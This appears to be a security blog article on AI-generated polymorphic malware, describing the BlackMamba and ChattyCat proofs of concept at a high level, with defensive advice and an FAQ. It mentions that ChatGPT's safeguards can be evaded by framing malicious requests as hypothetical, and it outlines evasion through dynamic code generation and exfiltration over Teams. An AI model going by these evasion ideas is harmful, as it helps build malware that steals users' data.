More
    HomeSecurityThe Growing Menace of AI-Powered Malware

    The Growing Menace of AI-Powered Malware

    Published on

    Malware has been a thorn in the side of cybersecurity professionals since the early days of the Internet. Cybersecurity teams are engaged in a seemingly never-ending cat-and-mouse game with cybercriminals as newer and more sophisticated attacks emerge yearly. While cybersecurity controls have matured considerably against malware, one development threatens to tip the scales in favor of cyber criminals, and that is AI-driven malware. In this article, we will discuss this new sophisticated breed of malware that leverages the power of AI to evade even the most cutting-edge cybersecurity products.

    How Cybercriminals have leveraged AI for Malware

    The rise of ChatGPT in recent times has been a game-changer for various industries, and cybercrime has been no exception. With its ability to automate and streamline multiple attacks, the AI-powered tool has changed perceptions of what AI can achieve and made it a topic of mainstream discussion. Unfortunately, this same power has also been harnessed by cybercriminals for various use cases, such as writing better phishing emails, researching exploits, automating attacks, etc., and now we can add malware to the list. 

    Researchers have demonstrated that the power of Large Language Models like ChatGPT can be used to create sophisticated types of malware that can dynamically alter their behavior at runtime, effectively making them invisible to the latest cybersecurity tools. This AI-powered malware, called BlackMamba, was developed as a proof of concept by researchers and uses a polymorphic keylogging functionality without reliance on a Command and Control infrastructure. This enables it to fly under the radar of current market-leading security tools that rely on these indicators for detecting malicious activity. 

    The malware is quite ingenious in how it evades detection. It uses a simple executable that interacts with OpenAI’s API to obtain code for keylogger functionality. This code is generated dynamically and is constantly updated, making it effectively invisible to even the market-leading endpoint detection and response (EDR) systems.

    Along with dynamically altering its code, it does not use a Command and Control infrastructure usually detectable by EDR solutions and instead leverages Microsoft Teams for exfiltrating its data. To prove the severity of this attack, BlackMamba was tested against a leading industry-grade EDR solution that could not detect it.   Malware could theoretically steal credentials, cardholder data, and other personal information that could be sent out via Microsoft Teams without any security product detecting the same. 

    Along with BlackMamba, another proof of concept called ChattyCat was also developed by CyberArk, which utilizes ChatGPT. The ChattyCat malware contacts ChatGPT to update and modify its code in a similar fashion to BlackMamba. Both have provided a template for how new ransomware and data exfiltration types can be created with the same capabilities and serve as a wake-up call to the cybersecurity community about this new threat. 

    Risks of AI-driven malware

    Despite the best efforts of the OpenAI team to put in content filters and guardrails to prevent ChatGPT from generating malicious code, cybercriminals can evade these checks and misuse the model for their malicious purposes. Malicious prompts that trick ChatGPT into generating code can be easily inputted by presenting them as hypothetical scenarios instead of actual ones. This also significantly reduces the learning curve for cybercriminals as ChatGPT dramatically reduces the technical bar needed for creating and launching such attacks. 

    BlackMamba and ChattyCat are merely proof of concepts, however the rise of AI-generated malware is very much real, and it is only a matter of time before we see its real-world counterparts appearing. The ability of this malware to continually change its behavior and operate without the need for a command and control infrastructure is a real threat to modern security solutions. 

    Remove malware from chrome

    The way forward

    ChatGPT has opened up Pandora’s box of security challenges and opportunities at the same time. AI regulations are still in development to gain some control over this technology however, cybersecurity professionals cannot afford to wait while these regulations are enacted. The risk of AI-powered technology is real, and we are only in the early stages of seeing how this technology can be misused. 

    It is essential to put in controls that enable Large Language Models (LLMs) to track the context of requests so that malicious inputs and responses can be detected. This would help to deter the usage of generative AI for creating malicious code and malware. Cybersecurity professionals also need to study how these malware operate and put in relevant controls to detect polymorphic code and suspicious activity on Microsoft Teams.

    We are entering a new age where simple prompts are enough to generate sophisticated malware capable of evading the most cutting-edge security tools. Cybersecurity teams need to upskill and risk assess their environments against these threats to see where they stand and what measures can be implemented. 

    Frequently Asked Questions

    How do cybercriminals leverage AI for malware?

    Cybercriminals harness the power of AI, specifically Large Language Models like ChatGPT, to automate and streamline various malicious activities. They utilize AI to write better phishing emails, research exploits, automate attacks, and even create sophisticated types of malware.

    What is AI-driven malware, and how does it evade detection?

    AI-driven malware, such as BlackMamba and ChattyCat, dynamically alters its behavior at runtime, making it invisible to the latest cybersecurity tools. By using executable code that interacts with OpenAI’s API, the malware can obtain keylogging functionality that is constantly updated, effectively evading endpoint detection and response (EDR) systems.

    What are the risks associated with AI-driven malware

    Despite content filters and guardrails implemented by OpenAI, cybercriminals can trick ChatGPT into generating malicious code by presenting hypothetical scenarios. This lowers the technical barrier for launching attacks and allows the malware to continually adapt its behavior, operating without a command and control infrastructure.

    How can cybersecurity teams address the threat of AI-driven malware?

    To combat AI-driven malware, cybersecurity teams need to update their controls and invest in tools that detect these evolving threats, such as AI-powered EDR. Implementing measures that enable Large Language Models to track the context of requests is crucial, making it possible to identify and prevent malicious inputs and responses. Upskilling and conducting risk assessments are essential for organizations to protect against these emerging security challenges.

    Latest articles

    spot_img

    More articles

    MFA at risk – How new attacks are targeting the second layer of authentication 

    Multi-factor Authentication (MFA) has remained one of the most consistent security best practices for...

    The ChatGPT Breach and What It Means for Companies 

    ChatGPT, the popular AI-driven chat tool, is now the most popular app of all...

    Prompt Injections – A New Threat to Large Language Models

    Large Language Models (LLMs) have increased in popularity since late 2022 when ChatGPT appeared...